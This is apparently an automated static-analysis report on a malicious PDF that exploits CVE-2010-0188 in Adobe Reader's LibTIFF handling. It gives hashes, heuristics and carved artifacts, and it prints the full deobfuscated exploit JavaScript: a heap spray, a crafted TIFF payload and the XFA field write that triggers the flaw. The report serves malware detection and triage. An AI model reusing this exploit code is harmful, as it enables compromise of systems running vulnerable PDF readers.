Malicious PDF — malware analysis report

Static analysis result for SHA-256 0f30ad13099a2e81…

MALICIOUS

PDF

9.6 KB
MD5: d4764784c391cd14a013929b290bcb71 SHA-1: 0771be46f33e83bbb9bd7febbf00387322b09c67 SHA-256: 0f30ad13099a2e8120e78528fe99b097caee061445967c9d8452e6b58fbf353e
118 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains XFA form elements and triggers a critical vulnerability (CVE-2010-0188) related to Adobe Reader's LibTIFF handling. This vulnerability is exploited by embedded JavaScript, which is designed to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness, and the presence of deobfuscated JavaScript confirms the exploitation attempt.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.xfa.org/schema/xfa-locale-set/2.1/ In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/1.0/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.2/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 7

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0041.bin
c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb		 pdf-embedded-file PDF EmbeddedFile object 41 at offset 0x109C 85 bytes
embedded_file_obj0042.bin
dda0835df994b8be920f715db36452f6cee7bb42bbc9c897f878a7b298ba8e91		 pdf-embedded-file PDF EmbeddedFile object 42 at offset 0x114E 1029 bytes
embedded_file_obj0063.bin
015ca25eba00104ec31e8bf7f47275a3732f548fa758cdc05df7b67cbf6f51b9		 pdf-embedded-file PDF EmbeddedFile object 63 at offset 0x1367 8672 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
embedded_file_obj0044.bin
3dd68f00f4fcb366a2a3a17c65cb2626eeddf5ea5713302d374310561d810169		 pdf-embedded-file PDF EmbeddedFile object 44 at offset 0x2390 144 bytes
embedded_file_obj0045.bin
10c03f88a5f0a0833dc5b2c8ac295b3a3c6f65e23889eb8cc1dc6fe29bf7f275		 pdf-embedded-file PDF EmbeddedFile object 45 at offset 0x243D 77 bytes
xfa_base26_stage_000.js
d8d3ec5f47d325a68c42d6909eb045895d79b4aacc4c4f8180318a569d1f0119		 deobfuscated-js XFA base-26 decoded JavaScript (decompressed) at offset 0x17B6 2146 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+rawd2.split('').reverse().join('').replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+rawd2.split('').reverse().join('').replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
deobfuscated.js
65040decb88b2dea1b439f0f66dabb9d2f592ed7305d418ab12d7e49fb035034		 deobfuscated-js PDF JavaScript deobfuscation pass 21085 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
2                                   �   �     � � ��   ;    � 
1.000 1.000 1.000 rg 0 0 m 9 0 l 9 9 l 0 9 l h f 0.000 0.000 0.000 RG 0 w 0 0 m 9 9 l S 9 0 m 0 9 l S 
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS) /Supplement 0 >> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
100 beginbfchar
<00> <FFFD>
<01> <FFFD>
<02> <FFFD>
<03> <FFFD>
<04> <FFFD>
<05> <FFFD>
<06> <FFFD>
<07> <FFFD>
<08> <FFFD>
<09> <FFFD>
<0A> <FFFD>
<0B> <FFFD>
<0C> <FFFD>
<0D> <FFFD>
<0E> <FFFD>
<0F> <FFFD>
<10> <FFFD>
<11> <FFFD>
<12> <FFFD>
<13> <FFFD>
<14> <FFFD>
<15> <FFFD>
<16> <FFFD>
<17> <FFFD>
<18> <FFFD>
<19> <FFFD>
<1A> <FFFD>
<1B> <FFFD>
<1C> <FFFD>
<1D> <FFFD>
<1E> <FFFD>
<1F> <FFFD>
<20> <0020>
<21> <0021>
<22> <0022>
<23> <0023>
<24> <0024>
<25> <0025>
<26> <0026>
<27> <0027>
<28> <0028>
<29> <0029>
<2A> <002A>
<2B> <002B>
<2C> <002C>
<2D> <002D>
<2E> <002E>
<2F> <002F>
<30> <0030>
<31> <0031>
<32> <0032>
<33> <0033>
<34> <0034>
<35> <0035>
<36> <0036>
<37> <0037>
<38> <0038>
<39> <0039>
<3A> <003A>
<3B> <003B>
<3C> <003C>
<3D> <003D>
<3E> <003E>
<3F> <003F>
<40> <0040>
<41> <0041>
<42> <0042>
<43> <0043>
<44> <0044>
<45> <0045>
<46> <0046>
<47> <0047>
<48> <0048>
<49> <0049>
<4A> <004A>
<4B> <004B>
<4C> <004C>
<4D> <004D>
<4E> <004E>
<4F> <004F>
<50> <0050>
<51> <0051>
<52> <0052>
<53> <0053>
<54> <0054>
<55> <0055>
<56> <0056>
<57> <0057>
<58> <0058>
<59> <0059>
<5A> <005A>
<5B> <005B>
<5C> <005C>
<5D> <005D>
<5E> <005E>
<5F> <005F>
<60> <0060>
<61> <0061>
<62> <0062>
<63> <0063>
endbfchar
100 beginbfchar
<64> <0064>
<65> <0065>
<66> <0066>
<67> <0067>
<68> <0068>
<69> <0069>
<6A> <006A>
<6B> <006B>
<6C> <006C>
<6D> <006D>
<6E> <006E>
<6F> <006F>
<70> <0070>
<71> <0071>
<72> <0072>
<73> <0073>
<74> <0074>
<75> <0075>
<76> <0076>
<77> <0077>
<78> <0078>
<79> <0079>
<7A> <007A>
<7B> <007B>
<7C> <007C>
<7D> <007D>
<7E> <007E>
<7F> <2022>
<80> <20AC>
<81> <2022>
<82> <201A>
<83> <0192>
<84> <201E>
<85> <2026>
<86> <2020>
<87> <2021>
<88> <02C6>
<89> <2030>
<8A> <0160>
<8B> <2039>
<8C> <0152>
<8D> <2022>
<8E> <017D>
<8F> <2022>
<90> <2022>
<91> <2018>
<92> <2019>
<93> <201C>
<94> <201D>
<95> <2022>
<96> <2013>
<97> <2014>
<98> <02DC>
<99> <2122>
<9A> <0161>
<9B> <203A>
<9C> <0153>
<9D> <2022>
<9E> <017E>
<9F> <0178>
<A0> <0020>
<A1> <00A1>
<A2> <00A2>
<A3> <00A3>
<A4> <00A4>
<A5> <00A5>
<A6> <00A6>
<A7> <00A7>
<A8> <00A8>
<A9> <00A9>
<AA> <00AA>
<AB> <00AB>
<AC> <00AC>
<AD> <002D>
<AE> <00AE>
<AF> <00AF>
<B0> <00B0>
<B1> <00B1>
<B2> <00B2>
<B3> <00B3>
<B4> <00B4>
<B5> <00B5>
<B6> <00B6>
<B7> <00B7>
<B8> <00B8>
<B9> <00B9>
<BA> <00BA>
<BB> <00BB>
<BC> <00BC>
<BD> <00BD>
<BE> <00BE>
<BF> <00BF>
<C0> <00C0>
<C1> <00C1>
<C2> <00C2>
<C3> <00C3>
<C4> <00C4>
<C5> <00C5>
<C6> <00C6>
<C7> <00C7>
endbfchar
56 beginbfchar
<C8> <00C8>
<C9> <00C9>
<CA> <00CA>
<CB> <00CB>
<CC> <00CC>
<CD> <00CD>
<CE> <00CE>
<CF> <00CF>
<D0> <00D0>
<D1> <00D1>
<D2> <00D2>
<D3> <00D3>
<D4> <00D4>
<D5> <00D5>
<D6> <00D6>
<D7> <00D7>
<D8> <00D8>
<D9> <00D9>
<DA> <00DA>
<DB> <00DB>
<DC> <00DC>
<DD> <00DD>
<DE> <00DE>
<DF> <00DF>
<E0> <00E0>
<E1> <00E1>
<E2> <00E2>
<E3> <00E3>
<E4> <00E4>
<E5> <00E5>
<E6> <00E6>
<E7> <00E7>
<E8> <00E8>
<E9> <00E9>
<EA> <00EA>
<EB> <00EB>
<EC> <00EC>
<ED> <00ED>
<EE> <00EE>
<EF> <00EF>
<F0> <00F0>
<F1> <00F1>
<F2> <00F2>
<F3> <00F3>
<F4> <00F4>
<F5> <00F5>
<F6> <00F6>
<F7> <00F7>
<F8> <00F8>
<F9> <00F9>
<FA> <00FA>
<FB> <00FB>
<FC> <00FC>
<FD> <00FD>
<FE> <00FE>
<FF> <00FF>
endbfchar
endcmap CMapName currentdict /CMap defineresource pop end end


/CS0 cs /P0 scn
1 i 
288 720 m
288 441 l
369 441 l
369 720 l
288 720 l
h
f
0 0 0 RG
0 i 0.5 w 10 M 0 j 0 J [0.5 1]0 d 
287.75 441 m
369.25 441 l
S
369 720.25 m
369 440.75 l
S
[2 1]0 d 
288 720.25 m
288 440.75 l
S
/Caption <</MCID 0 >>BDC 
0 0 0 rg
1 i 
BT
/C0_0 1 Tf
0 Tc 0 Tw 0  Ts 100  Tz 0 Tr 10 0 0 10 288 446.587 Tm
<002A>Tj
<004E>Tj
<0042>Tj
<0048>Tj
<0046>Tj
<0001>Tj
<0027>Tj
<004A>Tj
<0046>Tj
<004D>Tj
<0045>Tj
ET
EMC 

<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xml
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.